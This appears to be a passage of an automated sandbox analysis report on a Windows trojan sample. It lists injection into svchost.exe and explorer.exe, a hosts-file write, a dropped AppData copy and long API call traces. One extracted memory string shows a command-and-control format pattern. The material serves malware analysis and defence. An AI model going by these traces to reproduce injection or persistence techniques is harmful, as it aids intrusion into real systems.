Source: C:\Windows\System32\svchost.exe File written: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Memory written: C:\Windows\System32\svchost.exe base: FD73AF1010
Source: C:\Windows\System32\svchost.exe Memory written: C:\Windows\explorer.exe base: 3350000
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Memory written: C:\Windows\System32\svchost.exe base: F1BC0BF010
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Memory written: C:\Windows\System32\svchost.exe base: AD4FB3F010
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Memory written: C:\Windows\System32\svchost.exe base: 7F5728D010
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,GetProcessTimes,CompareFileTime,CloseHandle,Process32NextW,CloseHandle, explorer.exe 0_2_00007FF6CF9464B8
Source: C:\Windows\explorer.exe Code function: CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,GetProcessTimes,CompareFileTime,CloseHandle,Process32NextW,CloseHandle, explorer.exe 3_2_08B7D9FC
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,GetProcessTimes,CompareFileTime,CloseHandle,Process32NextW,CloseHandle, explorer.exe 4_2_00007FF6BCCA64B8
Source: C:\Windows\System32\svchost.exe Code function: CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,GetProcessTimes,CompareFileTime,CloseHandle,Process32NextW,CloseHandle, explorer.exe 5_2_00007FF78FA664B8
Source: C:\Windows\System32\svchost.exe Code function: CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,GetProcessTimes,CompareFileTime,CloseHandle,Process32NextW,CloseHandle, explorer.exe 9_2_00007FF7A34B64B8
Source: C:\Windows\System32\svchost.exe Code function: CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,GetProcessTimes,CompareFileTime,CloseHandle,Process32NextW,CloseHandle, explorer.exe 13_2_00007FF67F5564B8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Source: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe Process created: C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\7DF0.tmp.zx.exe"
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Source: explorer.exe, 00000003.00000003.3095338529.0000000009B91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3099827021.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3318474411.0000000009C22000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000003.00000000.2101304423.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3306123969.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, explorer.exe, 00000003.00000002.3309997455.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2677691458.000000000CAF6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2101304423.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.2101304423.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3306123969.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.2101304423.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3306123969.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000002.3304418358.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2100969793.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PProgman
Source: explorer.exe, 00000003.00000003.2677691458.000000000CAF6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3319025344.0000000009EE0000.00000020.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3327889570.0000000011050000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: Host: http(s)://%s|%s|%s|%d|info|%d|%d|%d|%d|%s|%s|%d|%dMozilla\\.\pipe\%sopenShell_TrayWndverclsid.exe3264child.dllTrusteerABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/>?>>?456789:;<=
Source: C:\Windows\explorer.exe Code function: 3_2_0336A012 cpuid 3_2_0336A012
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,wcschr,wcschr,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson, 0_2_00007FF6CF95B934
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon, 0_2_00007FF6CF959868
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 0_2_00007FF6CF95D04C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: GetLocaleInfoEx, 0_2_00007FF6CF95B830
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP, 0_2_00007FF6CF95B77C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: GetLocaleInfoEx,GetLocaleInfoEx,WideCharToMultiByte, 0_2_00007FF6CF95CEF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num, 0_2_00007FF6CF959DF4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo, 0_2_00007FF6CF95A57C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA, 0_2_00007FF6CF94DD34
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: EnumSystemLocalesEx, 0_2_00007FF6CF9592F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,GetLocaleInfoEx,_invoke_watson, 0_2_00007FF6CF9562BC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson, 0_2_00007FF6CF95B310
Source: C:\Windows\explorer.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 3_2_09F081CC
Source: C:\Windows\explorer.exe Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free, 3_2_09EFE35C
Source: C:\Windows\explorer.exe Code function: __crtGetLocaleInfoA,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,_calloc_crt,free, 3_2_09EFFAA0
Source: C:\Windows\explorer.exe Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free, 3_2_09F08A38
Source: C:\Windows\explorer.exe Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free, 3_2_09F08FC4
Source: C:\Windows\explorer.exe Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo, 3_2_09F0974C
Source: C:\Windows\explorer.exe Code function: GetLocaleInfoEx, 3_2_110821D0
Source: C:\Windows\explorer.exe Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_getptd,GetLocaleInfoEx, 3_2_1107B0E0
Source: C:\Windows\explorer.exe Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo, 3_2_1107A34C
Source: C:\Windows\explorer.exe Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free, 3_2_11079BC4
Source: C:\Windows\explorer.exe Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP, 3_2_1107B54C
Source: C:\Windows\explorer.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 3_2_11078DCC
Source: C:\Windows\explorer.exe Code function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free, 3_2_11078C70
Source: C:\Windows\explorer.exe Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage, 3_2_1107B704
Source: C:\Windows\explorer.exe Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free, 3_2_1106EF5C
Source: C:\Windows\explorer.exe Code function: _getptd,__lc_wcstolc,__get_qualified_locale,__lc_lctowcs,GetLocaleInfoEx,GetACP, 3_2_110747D4
Source: C:\Windows\explorer.exe Code function: GetLocaleInfoEx, 3_2_1107B600
Source: C:\Windows\explorer.exe Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free, 3_2_11079638
Source: C:\Windows\explorer.exe Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free, 3_2_110706A0
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num, 4_2_00007FF6BCCB9DF4
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo, 4_2_00007FF6BCCBA57C
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: GetLocaleInfoEx,GetLocaleInfoEx,WideCharToMultiByte, 4_2_00007FF6BCCBCEF0
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: GetLocaleInfoEx, 4_2_00007FF6BCCBB830
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP, 4_2_00007FF6BCCBB77C
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,wcschr,wcschr,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson, 4_2_00007FF6BCCBB934
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 4_2_00007FF6BCCBD04C
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon, 4_2_00007FF6BCCB9868
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson, 4_2_00007FF6BCCBB310
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,GetLocaleInfoEx,_invoke_watson, 4_2_00007FF6BCCB62BC
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: EnumSystemLocalesEx, 4_2_00007FF6BCCB92F0
Source: C:\Users\user\AppData\Roaming\{B268D441C1ED2974164258}\{B268D441C1ED2974164258}.exe Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA, 4_2_00007FF6BCCADD34
Source: C:\Windows\System32\svchost.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 5_2_00007FF78FA7D04C
Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoEx, 5_2_00007FF78FA7B830
Source: C:\Windows\System32\svchost.exe Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon, 5_2_00007FF78FA79868
Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP, 5_2_00007FF78FA7B77C
Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoEx,GetLocaleInfoEx,WideCharToMultiByte, 5_2_00007FF78FA7CEF0
Source: C:\Windows\System32\svchost.exe Code function: _calloc_crt,_malloc_crt,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num, 5_2_00007FF78FA79DF4
Source: C:\Windows\System32\svchost.exe Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA, 5_2_00007FF78FA6DD34
Source: C:\Windows\System32\svchost.exe Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo, 5_2_00007FF78FA7A57C
Source: C:\Windows\System32\svchost.exe Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,GetLocaleInfoEx,_invoke_watson, 5_2_00007FF78FA762BC
Source: C:\Windows\System32\svchost.exe Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson, 5_2_00007FF78FA7B310
Source: C:\Windows\System32\svchost.exe Code function: EnumSystemLocalesEx, 5_2_00007FF78FA792F0
Source: C:\Windows\System32\svchost.exe Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,wcschr,wcschr,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson, 5_2_00007FF78FA7B934
Source: C:\Windows\System32\svchost.exe Code function: EnumSystemLocalesEx, 9_2_00007FF7A34C92F0
Source: C:\Windows\System32\svchost.exe Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson, 9_2_00007FF7A34CB310
Source: C:\Windows\System32\svchost.exe Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,GetLocaleInfoEx,_invoke_watson, 9_2_00007FF7A34C62BC
Source: C:\Windows\System32\svchost.exe Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,wcschr,wcschr,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson, 9_2_00007FF7A34CB934
